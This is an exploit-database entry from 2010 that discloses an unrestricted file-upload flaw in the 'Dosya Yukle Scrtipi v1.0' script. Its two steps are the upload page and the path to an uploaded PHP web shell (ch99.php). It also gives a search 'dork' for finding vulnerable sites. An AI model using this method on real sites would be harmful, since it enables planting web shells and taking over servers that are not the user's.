id: 11156
date: 03/03/2010
title: Dosya Yukle Scrtipi v1.0 Shell Upload Vulnerability
author: indoushka
cves: 

===================================================
Dosya Yukle Scrtipi v1.0 Shell Upload Vulnerability
===================================================

========================================================================================                 
| # Title    : Dosya Yukle Scrtipi v1.0 Upload Vulnerability  
| # Author   : indoushka 
| # Dork     : Dosya Yukle Scrtipi v1.0                                                                                                              
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Upload                                                                    
======================      Exploit By indoushka       =================================
# Exploit  : 
 
1- http://127.0.0.1/dosyayukle/
 
2- http://127.0.0.1/dosyayukle/dosyalar/ch99.php



#  0day.today [2023-03-22]  #